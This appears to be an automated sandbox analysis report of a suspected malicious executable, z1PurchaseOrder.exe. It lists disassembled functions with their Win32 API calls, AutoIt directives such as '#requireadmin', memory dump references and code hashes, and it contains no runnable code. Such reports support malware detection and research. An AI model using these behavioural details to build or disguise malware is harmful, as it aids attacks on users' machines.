                                        • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                        • API String ID: 1729044348-3708979750
                                        • Opcode ID: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                        • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                        • Opcode Fuzzy Hash: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                        • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                        APIs
                                          • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z1PurchaseOrder.exe,?,C:\Users\user\Desktop\z1PurchaseOrder.exe,004A8E80,C:\Users\user\Desktop\z1PurchaseOrder.exe,0040F3D2), ref: 0040FFCA
                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                        • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                        • _wcscat.LIBCMT ref: 0044BCAA
                                        • _wcslen.LIBCMT ref: 0044BCB7
                                        • _wcslen.LIBCMT ref: 0044BCCB
                                        • SHFileOperationW.SHELL32 ref: 0044BD16
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 2326526234-1173974218
                                        • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                        • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                        • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                        • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                        APIs
                                          • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                        • _wcslen.LIBCMT ref: 004366DD
                                        • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                        • GetLastError.KERNEL32 ref: 0043670F
                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                        • _wcsrchr.LIBCMT ref: 0043674C
                                          • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                        • String ID: \
                                        • API String ID: 321622961-2967466578
                                        • Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                        • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                        • Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                        • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 1038674560-2734436370
                                        • Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                        • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                        • Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                        • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                        APIs
                                        • DeleteObject.GDI32(?), ref: 0044157D
                                        • GetDC.USER32(00000000), ref: 00441585
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID:
                                        • API String ID: 3864802216-0
                                        • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                        • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                        • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                        • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                          • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                          • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                          • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                        • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                          • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                        • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                          • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                        • ExitThread.KERNEL32 ref: 0041410F
                                        • GetCurrentThreadId.KERNEL32 ref: 00414115
                                        • __freefls@4.LIBCMT ref: 00414135
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                        • String ID:
                                        • API String ID: 1925773019-0
                                        • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                        • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                        • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                        • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                        APIs
                                        • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                        • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                        • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                        • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                        • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                        • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                        • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                        • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                        • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                        • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                        • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                          • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                        • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                        • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                        • _memset.LIBCMT ref: 00464B92
                                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                        • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                        • WSACleanup.WSOCK32 ref: 00464CE4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                        • String ID:
                                        • API String ID: 3424476444-0
                                        • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                        • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                        • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                        • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                        APIs
                                        • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MetricsSystem
                                        • String ID:
                                        • API String ID: 4116985748-0
                                        • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                        • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                        • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                        • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                        APIs
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ConnectRegistry_wcslen
                                        • String ID:
                                        • API String ID: 535477410-0
                                        • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                        • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                        • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                        • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                        APIs
                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                        • _memset.LIBCMT ref: 004538C4
                                        • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                        • _wcslen.LIBCMT ref: 00453960
                                        • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                        • String ID: 0
                                        • API String ID: 3530711334-4108050209
                                        • Opcode ID: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                        • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                        • Opcode Fuzzy Hash: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                        • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                        APIs
                                        • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                        • String ID: HH
                                        • API String ID: 3488606520-2761332787
                                        • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                        • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                        • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                        • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                        APIs
                                          • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                          • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                          • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                        • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                        • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                        • LineTo.GDI32(?,?), ref: 004474BF
                                        • CloseFigure.GDI32(?), ref: 004474C6
                                        • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                        • Rectangle.GDI32(?,?), ref: 004474F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                        • String ID:
                                        • API String ID: 4082120231-0
                                        • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                        • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                        • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                        • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                        APIs
                                          • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                          • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                          • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                        • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                        • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                        • LineTo.GDI32(?,?), ref: 004474BF
                                        • CloseFigure.GDI32(?), ref: 004474C6
                                        • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                        • Rectangle.GDI32(?,?), ref: 004474F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                        • String ID:
                                        • API String ID: 4082120231-0
                                        • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                        • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                        • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                        • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                        • String ID:
                                        • API String ID: 288456094-0
                                        • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                        • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                        • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                        • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                        APIs
                                        • GetParent.USER32(?), ref: 004449B0
                                        • GetKeyboardState.USER32(?), ref: 004449C3
                                        • SetKeyboardState.USER32(?), ref: 00444A0F
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                        • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                        • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                        • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                        APIs
                                        • GetParent.USER32(?), ref: 00444BA9
                                        • GetKeyboardState.USER32(?), ref: 00444BBC
                                        • SetKeyboardState.USER32(?), ref: 00444C08
                                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
